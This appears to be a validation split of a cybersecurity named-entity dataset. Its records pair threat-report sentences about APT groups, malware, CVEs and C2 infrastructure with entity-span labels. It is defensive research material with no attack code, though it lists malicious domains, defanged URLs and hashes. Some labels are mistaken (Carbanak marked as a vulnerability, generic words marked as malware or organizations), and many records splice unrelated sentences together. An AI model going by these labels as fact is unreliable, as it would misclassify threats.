{"text": "] 204 [ . The origins of the Duke toolset names can be traced back to when researchers at Kaspersky Labs coined the term \" MiniDuke \" to identify the first Duke-related malware they found . The loop then looks for the method name DownloadData , and if located will download a resource from a second C2 . On July 15th , Facebook revealed it tracked and partially disrupted a longrunning Iranian attack campaign that used accounts to pose as recruiters and draw in US targets before sending them malwareinfected files or tricking them into entering sensitive credentials to phishing sites .", "spans": {"Organization: Kaspersky Labs": [[90, 104]], "Organization: Facebook": [[319, 327]]}, "info": {"id": "cyberner_stix_valid_000058", "source": "cyberner_stix_valid"}}
{"text": "This report shares our researchers ’ analysis of the attack and Remote Access Tool ( RAT ) .", "spans": {}, "info": {"id": "cyberner_stix_valid_000059", "source": "cyberner_stix_valid"}}
{"text": "BOT UPDATES EventBot has a long method called parseCommand that can update EventBot ’ s configuration XML files , located in the shared preferences folder on the device . Such attacks highlight the need for caution before downloading files from unknown sources and enabling macro for files from unknown sources . The SHAPESHIFT wiper is capable of wiping disks and volumes , as well as deleting files .", "spans": {"Malware: EventBot": [[12, 20], [75, 83]], "Malware: attacks": [[176, 183]], "Malware: SHAPESHIFT wiper": [[317, 333]]}, "info": {"id": "cyberner_stix_valid_000060", "source": "cyberner_stix_valid"}}
{"text": "Once an application has been identified , Anubis overlays the original application with a fake login page to capture the user ’ s credentials . In the first attack , Butterfly gained a foothold by first attacking a small European office belonging to one firm and using this infection to then move on to its US office and European headquarters . All of the aforementioned groups greatly benefit from unpatched systems in corporate environments . The threat actors are distributing NetSupport RAT either as a zipped download or via an Internet shortcut .", "spans": {"Malware: Anubis": [[42, 48]]}, "info": {"id": "cyberner_stix_valid_000061", "source": "cyberner_stix_valid"}}
{"text": "To enable connections to the infected computer using the Remote Desktop Protocol ( RDP ) , Carbanak sets Termservice service execution mode to Auto . Once a victim is confirmed as \" interesting \" , the attackers upload another Epic backdoor which has a unique ID used to control this specific victim .", "spans": {"Vulnerability: Carbanak": [[91, 99]], "Malware: Epic backdoor": [[227, 240]]}, "info": {"id": "cyberner_stix_valid_000062", "source": "cyberner_stix_valid"}}
{"text": "The attackers used the same method of lateral movement by mounting the remote drive on a system , copying 1.bat to it , using task scheduler to execute the batch script , and finally , deleting the batch script . Previous reports have discussed Bisonal malware used in attacks against Japan , South Korea and Russia .", "spans": {"Indicator: Bisonal malware": [[245, 260]]}, "info": {"id": "cyberner_stix_valid_000063", "source": "cyberner_stix_valid"}}
{"text": "When the self-extracting archive file is executed , it will drop two files .", "spans": {}, "info": {"id": "cyberner_stix_valid_000064", "source": "cyberner_stix_valid"}}
{"text": "With the capability to open market applications , such as Google Play and 9Apps , with a specific keyword search or even a single application ’ s page , the actor can gain exposure for other threat actors and increase his profits . During intense intelligence gathering over the last 24 months , we observed the technical capabilities of the Operation Cleaver team rapidly evolve faster than any previously observed Iranian effort . While tracking what days of the week Suckfly used its hacktools , we discovered that the group was only active Monday through Friday .", "spans": {"System: Google Play": [[58, 69]], "System: 9Apps": [[74, 79]], "Malware: hacktools": [[487, 496]]}, "info": {"id": "cyberner_stix_valid_000065", "source": "cyberner_stix_valid"}}
{"text": "History has shown us that , in time , these attacks will use zero-day vulnerabilities , exploits or a combination of techniques . Hackers first actively spread bots using the Niteris exploit , and then search for infected devices at banks amongst their bots by analyzing IP addresses , cracked passwords and results of the modules performance . Recently we were able to observe these actors making modifications to their Clayslide delivery documents in an attempt to evade antivirus detection .", "spans": {"Vulnerability: zero-day vulnerabilities": [[61, 85]], "Vulnerability: Niteris exploit": [[175, 190]], "Organization: banks": [[233, 238]], "Malware: Clayslide delivery documents": [[421, 449]]}, "info": {"id": "cyberner_stix_valid_000066", "source": "cyberner_stix_valid"}}
{"text": "Analysis of TG-3390 's operations , targeting , and tools led CTU researchers to assess with moderate confidence the group is located in the People's Republic of China .", "spans": {"Organization: CTU": [[62, 65]], "Organization: People's Republic": [[141, 158]]}, "info": {"id": "cyberner_stix_valid_000067", "source": "cyberner_stix_valid"}}
{"text": "A Slice of 2017 Sofacy Activity .", "spans": {}, "info": {"id": "cyberner_stix_valid_000068", "source": "cyberner_stix_valid"}}
{"text": "Although multi-step overlays are not something new , their usage is generally limited to avoid raising suspicion . A series of standards lay out CIA malware infestation patterns which are likely to assist forensic crime scene investigators as well as Apple , Microsoft , Google , Samsung , Nokia , Blackberry , Siemens and anti-virus companies attribute and defend against attacks . DragonOK is a threat group that has targeted Japanese organizations with phishing emails .", "spans": {"Organization: Apple": [[251, 256]], "Organization: Microsoft": [[259, 268]], "Organization: Google": [[271, 277]], "Organization: Samsung": [[280, 287]], "Organization: Nokia": [[290, 295]], "Organization: Blackberry": [[298, 308]], "Organization: Siemens": [[311, 318]], "Organization: anti-virus companies": [[323, 343]], "Organization: organizations": [[437, 450]]}, "info": {"id": "cyberner_stix_valid_000069", "source": "cyberner_stix_valid"}}
{"text": "For example , we analyzed a DropIt sample ( SHA256 : cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671 ) that dropped two executables , one of which was saved to \" %TEMP%\\flash_update.exe \" that was a legitimate Flash Player installer . Another decoy slideshow associated with the Bookworm attack campaign contains photos of an event called Bike for Dad 2015 .", "spans": {"Malware: %TEMP%\\flash_update.exe": [[179, 202]], "Indicator: decoy slideshow": [[260, 275]]}, "info": {"id": "cyberner_stix_valid_000070", "source": "cyberner_stix_valid"}}
{"text": "However , this is not a genuine “ Google Play Protect ” screen ; instead it gives the app all the permissions it needs while simultaneously disabling the actual Google Play Protect . The first signs of Butterfly 's activities emerged in early 2013 when several major technology and internet firms were compromised . We link the AveMaria botnet to these two groups with medium confidence : AveMaria ’s targets are mostly suppliers for big companies , and the way AveMaria manages its infrastructure is very similar to FIN7 . Over 5 years ago , we began tracking a new campaign that we called FakeUpdates ( also known as SocGholish ) that used compromised websites to trick users into running a fake browser update .", "spans": {"System: Google Play": [[34, 45]], "System: Google Play Protect": [[161, 180]], "Organization: technology": [[267, 277]], "Organization: internet firms": [[282, 296]], "Malware: AveMaria": [[328, 336], [389, 397], [462, 470]], "Malware: FakeUpdates": [[591, 602]], "Malware: SocGholish": [[619, 629]]}, "info": {"id": "cyberner_stix_valid_000071", "source": "cyberner_stix_valid"}}
{"text": "The dropped file was determined as modified version of njRAT trojan .", "spans": {"Malware: njRAT trojan": [[55, 67]]}, "info": {"id": "cyberner_stix_valid_000072", "source": "cyberner_stix_valid"}}
{"text": "It is a powerful , multi-featured RAT that lets a threat actor take total control over a machine . The titles and contents of these files suggest that the actor targeted individuals affiliated with these government agencies and the Fatah political party .", "spans": {"Organization: government agencies": [[204, 223]], "Organization: Fatah political party": [[232, 253]]}, "info": {"id": "cyberner_stix_valid_000073", "source": "cyberner_stix_valid"}}
{"text": "Once the malware has been executed , it checks to see if it has a connection to the internet before running .", "spans": {}, "info": {"id": "cyberner_stix_valid_000074", "source": "cyberner_stix_valid"}}
{"text": "Advanced Malware Protection ( AMP ) is ideally suited to prevent the execution of the malware used by these threat actors . The Machete group is very active and has introduced several changes to its malware since a new version was released in April 2018 . From November 2015 through the end of 2016 , APT38 was involved in at least nine separate compromises against banks .", "spans": {"System: Advanced Malware Protection ( AMP )": [[0, 35]], "Organization: banks": [[366, 371]]}, "info": {"id": "cyberner_stix_valid_000075", "source": "cyberner_stix_valid"}}
{"text": "] it Bologna server3ct.exodus.connexxa [ . XENOTIME used credential capture and replay to move between networks , Windows commands , standard command-line tools such as PSExec , and proprietary tools for operations on victim hosts . Dfff0a7fa1a55c8c1a4966c19f6da452 : cmd . 51a7a76a7dd5d9e4651fe3d4c74d16d6 : downloadfile . 62c92ba585f74ecdbef4c4498a438984 : screenshot . First , the discovery of new OT malware presents an immediate threat to affected organizations , since these discoveries are rare and because the malware principally takes advantage of insecure by design features of OT environments that are unlikely to be remedied any time soon .", "spans": {"Indicator: Dfff0a7fa1a55c8c1a4966c19f6da452": [[233, 265]], "Indicator: 51a7a76a7dd5d9e4651fe3d4c74d16d6": [[274, 306]], "Indicator: 62c92ba585f74ecdbef4c4498a438984": [[324, 356]], "Malware: OT malware": [[401, 411]]}, "info": {"id": "cyberner_stix_valid_000076", "source": "cyberner_stix_valid"}}
{"text": "AlarmReceiver - Triggers every three minutes . DoublePulsar was delivered to victims using a custom exploit tool (Trojan.Bemstour) that was specifically designed to install DoublePulsar . A group known by Microsoft as NEODYMIUM is Oreportedly associated closely with BlackOasis operations , but evidence that the group names are aliases has not been identified .", "spans": {"Organization: Microsoft": [[205, 214]]}, "info": {"id": "cyberner_stix_valid_000077", "source": "cyberner_stix_valid"}}
{"text": "CapabilitiesFormBook is a data stealer , but not a full-fledged banker . Talos said the perpetrators of DNSpionage were able to steal email and other login credentials from a number of government and private sector entities in Lebanon and the United Arab Emirates by hijacking the DNS servers for these targets , so that all email and virtual private networking ( VPN ) traffic was redirected to an Internet address controlled by the attackers .", "spans": {"Organization: CapabilitiesFormBook": [[0, 20]], "Organization: banker": [[64, 70]], "Organization: Talos": [[73, 78]], "Organization: government": [[185, 195]]}, "info": {"id": "cyberner_stix_valid_000078", "source": "cyberner_stix_valid"}}
{"text": "Access to targets' Google accounts allows TG-4127 to review internal emails and potentially access other Google Apps services used by these organizations , such as Google Drive .", "spans": {"Organization: Google": [[19, 25], [105, 111], [164, 170]]}, "info": {"id": "cyberner_stix_valid_000079", "source": "cyberner_stix_valid"}}
{"text": "] info including the “ bankaustria ” brand . The first group , we identify as primary victims , includes national security organizations , ministries of foreign affairs , and prominent energy organizations . Patchwork : Dropping Elephant , Chinastrats , MONSOON , Operation Hangover .", "spans": {"Organization: national security organizations": [[105, 136]], "Organization: ministries": [[139, 149]], "Organization: prominent energy organizations": [[175, 205]]}, "info": {"id": "cyberner_stix_valid_000080", "source": "cyberner_stix_valid"}}
{"text": "Figure 6 . In this latest campaign , APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER . This RAT is a good example of how a highly focused attack that tries to blend its network traffic into the crowd can be highly effective . Copies of the site at archive.org show it was the work of someone calling themselves “ The Chaos Creator . ”", "spans": {"Vulnerability: Microsoft Office vulnerability": [[64, 94]], "Vulnerability: CVE-2017-11882": [[95, 109]]}, "info": {"id": "cyberner_stix_valid_000081", "source": "cyberner_stix_valid"}}
{"text": "Just don ’ t forget that the scan does not run automatically in the free version . The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 . The OilRig group ( AKA APT34 , Helix Kitten ) is an adversary motivated by espionage primarily operating in the Middle East region .", "spans": {"Malware: sample": [[229, 235]], "Vulnerability: CVE-2017-11882": [[255, 269]], "Vulnerability: CVE-2018-0802": [[273, 286]]}, "info": {"id": "cyberner_stix_valid_000082", "source": "cyberner_stix_valid"}}
{"text": "Firstly , the Dukes may have been confident enough in their own abilities ( and in the slowness of their opponents to react to new threats ) that they did not care if their targets may already be on the lookout for anyone exploiting these vulnerabilities .", "spans": {}, "info": {"id": "cyberner_stix_valid_000083", "source": "cyberner_stix_valid"}}
{"text": "The tool investigates the Local Security Authority Subsystem memory space in order to find , decrypt and display retrieved passwords . We also believe that both clusters of activity have links to attacks with likely Indian origins , the CONFUCIUS_A attacks are linked to the use of SNEEPY/BYEBYESHELL and the CONFUCIUS_B have a loose link to Hangover .", "spans": {"Malware: tool": [[4, 8]], "Malware: SNEEPY/BYEBYESHELL": [[282, 300]], "Indicator: CONFUCIUS_B": [[309, 320]], "Malware: Hangover": [[342, 350]]}, "info": {"id": "cyberner_stix_valid_000084", "source": "cyberner_stix_valid"}}
{"text": "File Name Modified Date SHA256 null_arm 2018-02-27 06:44:00 48a7dd672931e408662d2b5e1abcd6ef00097b8ffe3814f0d2799dd6fd74bd88 null_i686 2018-02-27 06:44:00 c228a534535b22a316a97908595a2d793d0fecabadc32846c6d1bfb08ca9a658 null_arm64 2018-02-27 06:43:00 48a7dd672931e408662d2b5e1abcd6ef00097b8ffe3814f0d2799dd6fd74bd88 Our data suggests that actors have deployed the RGDoor backdoor on webservers belonging to eight Middle Eastern government organizations , as well as one financial and one educational institution . At this time , the API key is revoked and the Twitter account is suspended . Analysis of memory core dump files", "spans": {"Organization: government organizations": [[428, 452]], "Organization: financial": [[470, 479]], "Organization: educational institution": [[488, 511]]}, "info": {"id": "cyberner_stix_valid_000085", "source": "cyberner_stix_valid"}}
{"text": "The attachment itself is an Microsoft Excel XLS document that contains malicious macro script .", "spans": {"Organization: Microsoft": [[28, 37]]}, "info": {"id": "cyberner_stix_valid_000086", "source": "cyberner_stix_valid"}}
{"text": "Keep in mind that while this case is about TANs , it can be any OTP , depending on which bank is being targeted . The threat actor attempted to compromise critical assets , such as database servers , billing servers , and the active directory . Inspecting the class C network for 185.162.235.0/24 shows us that another IP on the same network resolves to an OilRig domain , msoffice-cdn.com which we identified in August 2017 .", "spans": {}, "info": {"id": "cyberner_stix_valid_000087", "source": "cyberner_stix_valid"}}
{"text": "Device information : EventBot queries for device information like OS , model , etc , and also sends that to the C2 . We started connecting the dots when we discovered that the Okrum backdoor was used to drop a Ketrican backdoor , freshly compiled in 2017 . Evidence also suggests that APT32 has targeted network security and technology infrastructure corporations with connections to foreign investors .", "spans": {"Malware: EventBot": [[21, 29]], "Malware: Okrum backdoor": [[176, 190]], "Malware: Ketrican backdoor": [[210, 227]], "Organization: network security": [[304, 320]], "Organization: technology infrastructure corporations": [[325, 363]]}, "info": {"id": "cyberner_stix_valid_000088", "source": "cyberner_stix_valid"}}
{"text": "While OSX_DOK.C is designed for MAC S-OS OS X , which is a Unix-like system , WERDLOD is designed for Windows .", "spans": {"Malware: OSX_DOK.C": [[6, 15]], "Malware: WERDLOD": [[78, 85]], "System: Windows": [[102, 109]]}, "info": {"id": "cyberner_stix_valid_000089", "source": "cyberner_stix_valid"}}
{"text": "Allows an application to send SMS messages . Wikileaks has carefully reviewed the Year Zero disclosure and published substantive CIA documentation while avoiding the distribution of 'armed' cyberweapons until a consensus emerges on the technical and political nature of the CIA's program and how such 'weapons' should analyzed , disarmed and published . They have extensively used strategic web compromises to compromise victims .", "spans": {"Organization: Wikileaks": [[45, 54]]}, "info": {"id": "cyberner_stix_valid_000090", "source": "cyberner_stix_valid"}}
{"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . Our technical analysis of the malware used in these attacks showed close ties to BS2005 backdoors from operation Ke3chang , and to a related TidePool malware family discovered by Palo Alto Networks in 2016 that targeted Indian embassies across the globe .", "spans": {"Malware: malicious Microsoft Word document": [[90, 123]], "Vulnerability: CVE-2012-0158": [[143, 156]], "Indicator: malware": [[231, 238]], "Indicator: BS2005 backdoors": [[282, 298]], "Indicator: TidePool malware": [[342, 358]], "Organization: Palo Alto": [[380, 389]]}, "info": {"id": "cyberner_stix_valid_000091", "source": "cyberner_stix_valid"}}
{"text": "SEADUKE : First known activity October 2014 , Most recent known activity Spring 2015 , Other names SeaDaddy , SeaDask , C&C communication methods HTTP(S) , Known toolset components Backdoor .", "spans": {"Malware: SEADUKE": [[0, 7]], "Malware: SeaDaddy": [[99, 107]], "Malware: SeaDask": [[110, 117]], "Malware: C&C": [[120, 123]]}, "info": {"id": "cyberner_stix_valid_000092", "source": "cyberner_stix_valid"}}
{"text": "We encourage Android users to validate whether their accounts have been breached . BRONZE BUTLER uses credential theft tools such as Mimikatz and WCE to steal authentication information from the memory of compromised hosts . the code was modified to catch and pass the mblock_t of the jnz instruction to the sub-instruction . For instance , Rising Sun was observed in attacks before the discovery of ' Sharpshooter ' and shared the tactics , techniques , and procedures ( TTPs ) seen in operations attributed to Lazarus group .", "spans": {"System: Android": [[13, 20]], "System: Sharpshooter": [[402, 414]]}, "info": {"id": "cyberner_stix_valid_000093", "source": "cyberner_stix_valid"}}
{"text": "One of these [ CVE-2015-5119 ] was a Flash zero-day . The organised crime group started its high-tech criminal activities in late 2013 by launching the Anunak malware campaign that targeted financial transfers and ATM networks of financial institutions around the world . The guessing is not 100% accurate however it works for the majority of obfuscated functions tested . Duqu uses a custom command and control protocol that communicates over commonly used ports , and is frequently encapsulated by application layer protocols.[5 ]", "spans": {"Vulnerability: CVE-2015-5119": [[15, 28]], "Organization: financial institutions": [[230, 252]]}, "info": {"id": "cyberner_stix_valid_000094", "source": "cyberner_stix_valid"}}
{"text": "Attackers can send SMS with certain messages to activate the agent and trigger corresponding action . To enable connections to the infected computer using the Remote Desktop Protocol ( RDP ) , Carbanak sets Termservice service execution mode to Auto . The analyst is then required to resolve the correct next block and modify the destination accordingly . The group also engaged in the theft of digital certificates which they then used to sign their malware to make them stealthier .", "spans": {"Vulnerability: Carbanak": [[193, 201]]}, "info": {"id": "cyberner_stix_valid_000095", "source": "cyberner_stix_valid"}}
{"text": "Suckfly paints a stark picture of where cyberattack groups and cybercriminals are focusing their attentions .", "spans": {}, "info": {"id": "cyberner_stix_valid_000096", "source": "cyberner_stix_valid"}}
{"text": "January 23 , 2017 SpyNote RAT posing as Netflix app As users have become more attached to their mobile devices , they want everything on those devices . Silence also started using Ivoke , a fileless loader , and EDA agent , both written in PowerShell . This report describes the details and type of operations carried out by Carbanak that focuses on financial industry , such as payment providers , retail industry and PR companies .", "spans": {"Malware: SpyNote RAT": [[18, 29]], "System: Netflix app": [[40, 51]], "Malware: Carbanak": [[325, 333]], "Organization: financial industry": [[350, 368]], "Organization: payment providers": [[379, 396]], "Organization: retail industry": [[399, 414]], "Organization: PR companies": [[419, 431]]}, "info": {"id": "cyberner_stix_valid_000097", "source": "cyberner_stix_valid"}}
{"text": "This technique reminds us of a combination between ages old war strategies “ Divide et impera ” and “ By way of deception ” . Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 . Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information .", "spans": {"Malware: RTF files": [[171, 180]], "Vulnerability: CVE-2017-8570": [[192, 205]], "Organization: oil": [[402, 405]], "Organization: gas": [[408, 411]], "Organization: petrochemical companies": [[418, 441]], "Organization: executives": [[471, 481]]}, "info": {"id": "cyberner_stix_valid_000098", "source": "cyberner_stix_valid"}}
{"text": "The diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals . There are new TTPs used in this attack – for example Agent_Drable is leveraging the Django Python framework for command and control infrastructure , the technical details of which are outlined later in the blog .", "spans": {"Malware: Sea Turtle": [[67, 77]], "Malware: Django": [[219, 225]]}, "info": {"id": "cyberner_stix_valid_000099", "source": "cyberner_stix_valid"}}
{"text": "Although most apps have positive ratings , some of the users have noticed and reported Judy ’ s suspicious activities , as seen in the images below : As seen in previous malware , such as DressCode , a high reputation does not necessarily indicate that the app is safe for use . ALLANITE conducts malware-less operations primarily leveraging legitimate and available tools in the Windows operating system . When the connection is established a new thread is spawned that starts with the MainConnectionIo function . The leaked Biderman emails show that Harrison made good on his threats , and that in the months that followed Harrison began targeting Biderman and other Ashley Madison executives with menacing anonymous emails and spoofed phone calls laced with profanity and anti - Semitic language .", "spans": {"Malware: Judy": [[87, 91]], "Malware: DressCode": [[188, 197]], "Organization: Biderman": [[650, 658]], "Organization: Ashley Madison executives": [[669, 694]]}, "info": {"id": "cyberner_stix_valid_000100", "source": "cyberner_stix_valid"}}
{"text": "In addition , the use of shared-hosting providers adds flexibility to the threat actor ’ s campaign and makes it harder for defending parties to track these moving targets . We had previously observed this author name in use once before , in the very first ThreeDollars document we collected that we had reported on in August 2017 . The filename is also randomly generated based on a dictionary $ARRAY[5]=[\"prc\" ,\"winrar\" ,\"chrome\" ,\"sync\" ,\"COM surr\"] . LockBit reportedly squeezed about $ 91 million out of US organizations with around 1,700 attacks since 2020 , according to a June report by CISA .", "spans": {"Malware: ThreeDollars document": [[257, 278]], "Organization: US organizations": [[509, 525]], "Organization: CISA": [[595, 599]]}, "info": {"id": "cyberner_stix_valid_000101", "source": "cyberner_stix_valid"}}
{"text": "However , Brazilian actors commonly use several methods to do so , such as reselling cards they have created , paying bills with stolen cards in return for a portion of the bill's value and reselling illicitly obtained goods . The SWC of a Uyghur cultural website suggests intent to target the Uyghur ethnic group , a Muslim minority group primarily found in the Xinjiang region of China .", "spans": {"Organization: Uyghur ethnic group": [[294, 313]], "Organization: Muslim minority group": [[318, 339]]}, "info": {"id": "cyberner_stix_valid_000102", "source": "cyberner_stix_valid"}}
{"text": "] net app store was replaced with the malicious HenBox app ; however , some indicators point to the server running an outdated version of Apache Web Server on a Windows 32-Bit operating system . The Trojan is quite similar to the .NET RocketMan Trojan and can handle the same commands; additionally , it includes the #screen” command to take a screenshot . Similar to RIPTIDE campaigns , APT12 infects target systems with HIGHTIDE using a Microsoft Word ( .doc ) document that exploits CVE-2012-0158 .", "spans": {"Malware: HenBox": [[48, 54]], "System: Windows": [[161, 168]], "Malware: Trojan": [[199, 205]], "Malware: .NET RocketMan Trojan": [[230, 251]], "Malware: HIGHTIDE": [[422, 430]], "Indicator: .doc": [[456, 460]], "Vulnerability: CVE-2012-0158": [[486, 499]]}, "info": {"id": "cyberner_stix_valid_000103", "source": "cyberner_stix_valid"}}
{"text": "Internal name : DWN_DLL_MAIN.dll File format : PE32 DLL MD5: ce8b99df8642c065b6af43fde1f786a3 Linker version : 11.0 , Microsoft Visual Studio Linker timestamp : 2015.07.28 13:05:20 ( GMT ) .", "spans": {"Indicator: DWN_DLL_MAIN.dll": [[16, 32]], "Indicator: ce8b99df8642c065b6af43fde1f786a3": [[61, 93]], "Organization: Microsoft": [[118, 127]]}, "info": {"id": "cyberner_stix_valid_000104", "source": "cyberner_stix_valid"}}
{"text": "Targeting a safety system indicates significant damage and loss of human life were either intentional or acceptable goals of the attack , a consequence not seen in previous disruptive attacks such as the 2016 CRASHOVERRIDE malware that caused a power loss in Ukraine .", "spans": {"Malware: CRASHOVERRIDE": [[209, 222]]}, "info": {"id": "cyberner_stix_valid_000105", "source": "cyberner_stix_valid"}}
{"text": "The commands supported by the most recent version of the bot are listed below . Based on the technical data uncovered , and in light of recent disclosures by the U.S. Department of Justice on the ongoing activities of Chinese state-sponsored threat actors . krjregh.sacreeflame.com lywja.healthsvsolu.com .", "spans": {"Indicator: krjregh.sacreeflame.com": [[258, 281]], "Indicator: lywja.healthsvsolu.com": [[282, 304]]}, "info": {"id": "cyberner_stix_valid_000106", "source": "cyberner_stix_valid"}}
{"text": "It is important to remember there are many threat actors operating in the Middle East , and often there are overlaps in TTPs , tools , motivation , and victimology .", "spans": {}, "info": {"id": "cyberner_stix_valid_000107", "source": "cyberner_stix_valid"}}
{"text": "Report_URL : https://www.secureworks.com/blog/living-off-the-land", "spans": {}, "info": {"id": "cyberner_stix_valid_000108", "source": "cyberner_stix_valid"}}
{"text": "com.xiaomi.smarthome.receive_alarm Received notifications from Xiaomi ’ s smart home IoT devices . We have also observed APT41 limitedly deploy rootkits on Linux systems and Master Boot Record (MBR) bootkits , such as ROCKBOOT , on Windows systems to hide their malware and maintain persistence on victim systems . Another attack group , Earworm ( aka Zebrocy ) , has been active since at least May 2016 and is involved in what appears to be intelligence gathering operations against military targets in Europe , Central Asia , and Eastern Asia .", "spans": {"Organization: Xiaomi": [[63, 69]]}, "info": {"id": "cyberner_stix_valid_000109", "source": "cyberner_stix_valid"}}
{"text": "Indicators of compromise ( IOC ) URLs hxxp : //5.9.33.226:5416 hxxp : //172.110.10.171:85/testcc.php hxxp : //sub1.tdsworker.ru:5555/3ds/ Hash values Package.apk - A342a16082ea53d101f556b50532651cd3e3fdc7d9e0be3aa136680ad9c6a69f eCommon.dl - 604deb75eedf439766896f05799752de268baf437bf89a7185540627ab4a4bd1 This group is very active and continues to develop new features for its malware , and implement infrastructure changes in 2019 . During one reported incident , APT38 caused an outage in the bank 's essential services .", "spans": {"Organization: bank": [[497, 501]]}, "info": {"id": "cyberner_stix_valid_000110", "source": "cyberner_stix_valid"}}
{"text": "It eventually kills all threads that belong to these undesired modules ( using ZwQueryInformationThread native API with ThreadQuerySetWin32StartAddress information class ) . The loader 's main goal was to run a PowerShell command to execute shellcode . Winnti : T1050 New Service . The script contains 1,759 lines of code .", "spans": {}, "info": {"id": "cyberner_stix_valid_000111", "source": "cyberner_stix_valid"}}
{"text": "This macOS malware used public source code in order to build crafted macOS installers .", "spans": {"System: macOS": [[5, 10], [69, 74]]}, "info": {"id": "cyberner_stix_valid_000112", "source": "cyberner_stix_valid"}}
{"text": "6bdfb79f813448b7f1b4f4dbe6a45d1938f3039c93ecf80318cedd1090f7e341 ADDITIONAL INFORMATION Packages monitored pin.secret.access com.chase.sig.android com.morganstanley.clientmobile.prod com.wf.wellsfargomobile com.citi.citimobile com.konylabs.capitalone com.infonow.bofa com.htsu.hsbcpersonalbanking com.usaa.mobile.android.usaa In the Naikon scheme , a C&C server can be specialized XSControl software running on the host machine . Rancor : cswksfwq.kfesv.xyz . An adversary could potentially instruct a control systems device to perform an action that will cause an Impact", "spans": {"Indicator: cswksfwq.kfesv.xyz": [[439, 457]], "Vulnerability: An adversary could potentially instruct a control systems device to perform an action that will cause an Impact": [[460, 571]]}, "info": {"id": "cyberner_stix_valid_000113", "source": "cyberner_stix_valid"}}
{"text": "'' For each interaction , the malware will check if the generator is a package that belongs to the anti-virus list , the malware will abuse another feature of the Accessibility API . In 2012 , the Molerats attacks appeared to rely heavily on the XtremeRAT , a freely available tool that is popular with attackers based in the Middle East . ShadowHammer : Liveupdate_Test_VER365.zip . In the UK , education has suffered a significant drop in funding in the last decade , according to the non - partisan Education Policy Institute .", "spans": {"System: Accessibility API": [[163, 180]], "Indicator: Liveupdate_Test_VER365.zip": [[355, 381]], "Organization: Education Policy Institute": [[502, 528]]}, "info": {"id": "cyberner_stix_valid_000114", "source": "cyberner_stix_valid"}}
{"text": "We found new variants of the Powermud backdoor , a new backdoor ( Backdoor.Powemuddy ) , and custom tools for stealing passwords , creating reverse shells , privilege escalation , and the use of the native Windows cabinet creation tool , makecab.exe , probably for compressing stolen data to be uploaded . COVELLITE remains active but appears to have abandoned North American targets , with indications of activity in Europe and East Asia .", "spans": {"Malware: Backdoor.Powemuddy": [[66, 84]], "Malware: makecab.exe": [[238, 249]]}, "info": {"id": "cyberner_stix_valid_000115", "source": "cyberner_stix_valid"}}
{"text": "This content is then uploaded to a remote site outside of the compromised organization completing the attack .", "spans": {}, "info": {"id": "cyberner_stix_valid_000116", "source": "cyberner_stix_valid"}}
{"text": "Command-and-Control ( C2 ) IP addresses :", "spans": {}, "info": {"id": "cyberner_stix_valid_000117", "source": "cyberner_stix_valid"}}
{"text": "The target is encouraged to click on the link to read the entire article .", "spans": {}, "info": {"id": "cyberner_stix_valid_000118", "source": "cyberner_stix_valid"}}
{"text": "We incorporated those changes into our build , discovering that this worked for most sample versions with almost no further modification .", "spans": {}, "info": {"id": "cyberner_stix_valid_000119", "source": "cyberner_stix_valid"}}
{"text": "Using a publicly available rooting framework , the PHA attempts to root devices and gain persistence on them by reinstalling itself on the system partition of rooted device . During Kaspersky Lab 's analysis of NetTraveler , the company 's experts identified six victims that had been infected by both NetTraveler and Red October , which was another cyberespionage operation analyzed by Kaspersky Lab in January 2013 . On the same date that APT16 targeted Taiwanese media , suspected Chinese APT actors also targeted a Taiwanese government agency , sending a lure document that contained instructions for registration and subsequent listing of goods on a local Taiwanese auction website . Since then , Apple released a new fix for iOS , iPadOS and macOS that reliably fixes the vulnerability again .", "spans": {"Organization: Kaspersky Lab": [[182, 195], [387, 400]], "Organization: Taiwanese government": [[519, 539]], "Organization: Apple": [[702, 707]], "System: iOS": [[731, 734]], "System: iPadOS": [[737, 743]], "System: macOS": [[748, 753]]}, "info": {"id": "cyberner_stix_valid_000120", "source": "cyberner_stix_valid"}}
{"text": "The threat actors behind the Sea Turtle campaign were successful in compromising entities by manipulating and falsifying DNS records at various levels in the domain name space . As of this publication , BRONZE UNION remains a formidable threat group that targets intellectual property and executes its operations at a swift pace .", "spans": {}, "info": {"id": "cyberner_stix_valid_000121", "source": "cyberner_stix_valid"}}
{"text": "Although the MenuPass Group used mostly publicly available RATs , they were successful in penetrating a number of high value targets , so it is entirely possible this is indeed a continuation of past activity . The group uses legitimate administration tools to fly under the radar in their post-exploitation phase , which makes detection of malicious activity , as well as attribution more complicated .", "spans": {}, "info": {"id": "cyberner_stix_valid_000122", "source": "cyberner_stix_valid"}}
{"text": "ESET detections of Android/AdDisplay.Ashas on Android devices by country Is adware harmful ? We observed implementation of this bypass in the macro code to invoke regsvr32.exe , along with a URL passed to it which was hosting a malicious SCT file . These implants are variations of earlier forms of Bankshot , a remote access tool that gives an attacker full capability on a victim 's system .", "spans": {"Organization: ESET": [[0, 4]], "Malware: Android/AdDisplay.Ashas": [[19, 42]], "Malware: regsvr32.exe": [[163, 175]], "Malware: SCT file": [[238, 246]], "Malware: Bankshot": [[299, 307]]}, "info": {"id": "cyberner_stix_valid_000123", "source": "cyberner_stix_valid"}}
{"text": "This malicious APK is 334326 bytes file , MD5 : 0b8806b38b52bebfe39ff585639e2ea2 and is detected by Kaspersky Lab products as “ Backdoor.AndroidOS.Chuli.a ” . PROMETHIUM and NEODYMIUM both used a zero-day exploit that executed code to download a malicious payload . In addition to stealing keystrokes , Naikon also intercepted network traffic .", "spans": {"Organization: Kaspersky Lab": [[100, 113]], "Vulnerability: zero-day exploit": [[196, 212]]}, "info": {"id": "cyberner_stix_valid_000124", "source": "cyberner_stix_valid"}}
